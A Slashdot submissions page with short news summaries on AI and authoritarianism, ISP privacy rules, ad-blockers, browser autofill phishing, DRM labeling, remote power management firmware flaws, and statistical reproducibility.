Follow Slashdot blog updates by subscribing to our blog RSS feed


Forgot your password?
DEAL: For $25 - Add A Second Phone Number To Your Smartphone for life! Use promo code SLASHDOT25. Also, Slashdot's Facebook page has a chat bot now. Message it for stories and more. Check out the new SourceForge HTML5 Internet speed test! ×

Submission + - SPAM: Artificial intelligence is ripe for abuse, tech researcher warns

randomErr writes: As artificial intelligence becomes more powerful, people need to make sure it’s not used by authoritarian regimes to centralize power and target certain populations, Microsoft Research’s Kate Crawford warned on Sunday. “Just as we are seeing a step function increase in the spread of AI, something else is happening: the rise of ultra-nationalism, rightwing authoritarianism and fascism,” she said. All of these movements have shared characteristics, including the desire to centralize power, track populations, demonize outsiders and claim authority and neutrality without being accountable. Machine intelligence can be a powerful part of the power playbook, she said.

Submission + - EFF needs your help to stop Congress dismantling Internet privacy protections! (

Peter Eckersley writes: Last year the FCC passed rules forbidding ISPs (both mobile and landline) from using your personal data without your consent for purposes other than providing you Internet access. In other words, the rules prevent ISPs from turning your browsing history into a revenue stream to sell to marketers and advertisers. Unfortunately, members of Congress are scheming to dismantle those protections as early as this week. If they succeed, ISPs would be free to resume selling users' browsing histories, pre-loading phones with spyware, and generally doing all sorts of creepy things to your traffic.

The good news is, we can stop them. We especially need folks in the key states of Alaska, Colorado, Maine, Montana, Nevada, Ohio, and Pennsylvania to call their senators this week and tell them not to kill the FCC's Broadband Privacy Rules.

Together, we can stop Congress from undermining these crucial privacy protections.

Submission + - There hasn't been Ad-blockers coverage for months, and that's bad news ( writes: Have you noticed no relevant media outlet is talking about ad-blockers anymore?

You probably haven't, and that's really what got me thinking. It's not like ads have all become "acceptable", not even close. And to my eyes, I haven't really noticed a decrease in ads overall — if anything, they have increased, and so has the practice of detecting them and forcing them out by making sites useless otherwise.

How far will it be until ad-blockers fall into oblivion? In a time where the main sources of information depend financially (and some even claim desperately) on the non-proliferation of ad-blocking, the first result to "ad-block news" search on Google dates back to September 2016 (an article by The Verge), and there doesn't seem to be anything newer on the following 10 results. Do note: this is a Google (ad-dependent) result outputting pageranked news outlet sites (also ad-dependent), so it can't really be discerned who is at fault here, but I doubt it is ad-block that is becoming irrelevant news material. Undesired sounds more likely.

But if that wasn't enough of a sign: even Slashdot articles are neglecting the subject. Looking up articles on "adblock" goes as far back as last year's August. Unless, of course, this one makes it to the top. If before you had to doubt most information about ad-blockers, now that no information is circulating, can you really trust news from these sources that discriminates with such a heavy bias?

Submission + - Browser Form Autofill Profiles Can Be Abused for Phishing Attacks (

An anonymous reader writes: Browser autofill profiles are a reliable phishing vector that allow attackers to collect information from users via hidden form fields, which the browser automatically fills with preset personal information and which the user unknowingly sends to the attacker when he submits a form.

There's an online demo where you can test this behavior. [GIF]

Browsers that support autofill profiles are Google Chrome, Safari, and Opera. Browsers like Edge, Vivaldi, and Firefox don't support this feature, but Mozilla is currently working on a similar feature.

Submission + - Weapons of Math Destruction Author: Models are Opinions Embedded in Math (

dangle writes: The LA Times has an interview with "Weapons of Math Destruction" author Cathy O'Neil discussing her concerns about the social consequences of ill-considered mathematical modeling. She discusses the example of a NYC Department of Education algorithm designed to grade school teachers that no one outside of the coders had access to. "The Department of Education did not know how to explain the scores that they were giving out to teachers," she observes. "...(T)he very teachers whose jobs are on the line don’t understand how they’re being evaluated. I think that’s a question of justice. Everyone should have the right to know how they’re being evaluated at their job," she argues. Another example discussed is a Los Angeles Department of Children and Family Services risk-modeling algorithm developed by SAS to score children according to their risk of being abused so that social workers can better target their efforts. Depending on the ethical considerations, such an algorithm could intentionally overweight factors such as income or ethnicity in a way that could tip the balance between right to privacy and protection of abused minors one way or another. "I want to separate the moral conversations from the implementation of the data model that formalizes those decisions. I want to see algorithms as formal versions of conversations that have already taken place," she concludes.

Submission + - What are the FLOSS community's answers to Siri and AI? (

jernst writes: A decade ago, we in the free and open-source community could build our own versions of pretty much any proprietary software system out there, and we did. Publishing, collaboration, commerce, you name it. Some apps were worse, some were better than closed alternatives, but much of it was clearly good enough to use every day.

But is this still true? For example, voice control is clearly going to be a primary way we interact with our gadgets in the future. Speaking to an Amazon Echo-like device while sitting on my couch makes a lot more sense than using a web browser. Will we ever be able to do that without going through somebody’s proprietary silo like Amazon’s or Apple’s? Where are the free and/or open-source versions of Siri, Alexa and so forth?

The trouble, of course, is not so much the code, but in the training. The best speech recognition code isn’t going to be competitive unless it has been trained with about as many millions of hours of example speech as the closed engines from Apple, Google and so forth have been. How can we do that?

The same problem exists with AI. There’s plenty of open-source AI code, but how good is it unless it gets training and retraining with gigantic data sets? We don’t have those in the FLOSS world, and even if we did, would we have the money to run gigantic graphics card farms 24×7? Will we ever see truly open AI that is not black-box machinery guarded closely by some overlord company, but something that “we can study how it works, change it so it does our computing as we wish” and all the other values embodied in the Free Software Definition?

Who has a plan, and where can I sign up to it?

Submission + - EFF Asks FTC To Demand 'Truth In Labeling' For DRM (

An anonymous reader writes: Interesting move by Cory Doctorow and the EFF in sending some letters to the FTC making a strong case that DRM requires some "truth in labeling" details in order to make sure people know what they're buying. The argument is pretty straightforward (PDF): "The legal force behind DRM makes the issue of advance notice especially pressing. It’s bad enough to when a product is designed to prevent its owner from engaging in lawful, legitimate, desirable conduct — but when the owner is legally prohibited from reconfiguring the product to enable that conduct, it’s vital that they be informed of this restriction before they make a purchase, so that they might make an informed decision. Though many companies sell products with DRM encumbrances, few provide notice of these encumbrances. Of those that do, fewer still enumerate the restrictions in plain, prominent language. Of the few who do so, none mention the ability of the manufacturer to change the rules of the game after the fact, by updating the DRM through non-negotiable updates that remove functionality that was present at the time of purchase." In a separate letter (PDF) from EFF, along with a number of other consumer interest groups, but also content creators like Baen Books, Humble Bundle and McSweeney's, they suggest some ways that a labeling notice might work.

Submission + - Neuroscience would Fail to Make Sense of a 1970's Era Microprocessor, Says Paper (

wherrera writes: According to a preprint entitled "Could a neuroscientist understand a microprocessor?" on the biology preprint archive, using the same techniques as used in with latest probes used to inspect the function of the mammalian brain and its connectome fail spectacularly when used to probe a running simulation of the MOS6502 processor used in playing the classic Atari era video games Donkey Kong, Space Invaders, and Pitfall.

The investigators used probability analysis of correlation in signals as well as such techniques as "lesion studies" which used the destruction of a simulated transistor to imitate the process used by researchers investigating the effects of a lesion on the nervous system. They conclude that reverse engineering the brain is likely not to succeed until we have a better understanding of what the brain as a system is doing, since "we do not generally know how the output relates to the inputs" in the brain to even begin to properly guide such investigations.

Link to the preprint is here.

Submission + - Lights out: flaws in remote power management gear let hackers pull the plug (

chicksdaddy writes: Passcode is reporting ( that researchers are warning about security vulnerabilities in widely used remote power management (RPM) equipment could give malicious hackers the ability to remotely shut off power to critical information systems and industrial machinery.

Researchers at Georgia-based BorderHawk said that it discovered suspicious traffic emanating from compromised RPM devices while working at a large energy firm. An investigation found more reasons for concern: undocumented, no-authentication required features hidden in firmware that could be used to dump a list of user accounts and passwords to access the device. Researchers also found a link to a malicious domain located in China buried in a help file.

RPMs are simple network hardware containing two power outlets to plug in equipment as well as an Ethernet and serial ports for connecting to the network or directly to another computer.

The work by BorderHawk jives with work done by the security consulting firm Senrio Inc. (formerly called Xipiter - Researchers there analyzed the NetBooter NP-02B – made by the Arizona firm SynAccess Networks and found hidden, no authentication features in that device's firmware lets anyone remotely reset the NetBooter device to its factory default configuration. Another allows anyone to modify network and system settings. A third, hidden function could be used to extract data (like a recently entered password) stored in the device’s memory, according to Stephen Ridley, a principal at Senrio. Searches using the search engine reveal hundreds of publicly accessible SynAccess RPM devices deployed at universities, on government networks, and other businesses.

The problem is a byproduct of changes in the way that technology firms source and build their products, often relying on far-flung networks of manufacturers and suppliers who operate with little oversight or quality control.

"Hardware is a misunderstood, unknown territory," said noted electrical engineer and inventor Joe Grand of Grand Idea Studio. "People buy a piece of hardware and take it for granted. They assume it is secure. They assume it does what it does and only does what it does."

Submission + - Weak statistical standards implicated in scientific irreproducibility ( 1

ananyo writes: The plague of non-reproducibility in science may be mostly due to scientists’ use of weak statistical tests, as shown by an innovative method developed by statistician Valen Johnson, at Texas A&M University. Johnson found that a P value of 0.05 or less — commonly considered evidence in support of a hypothesis in many fields including social science — still meant that as many as 17–25% of such findings are probably false. He advocates for scientists to use more stringent P values of 0.005 or less to support their findings, and thinks that the use of the 0.05 standard might account for most of the problem of non-reproducibility in science — even more than other issues, such as biases and scientific misconduct.

Slashdot Top Deals

"Open the pod bay doors, HAL." -- Dave Bowman, 2001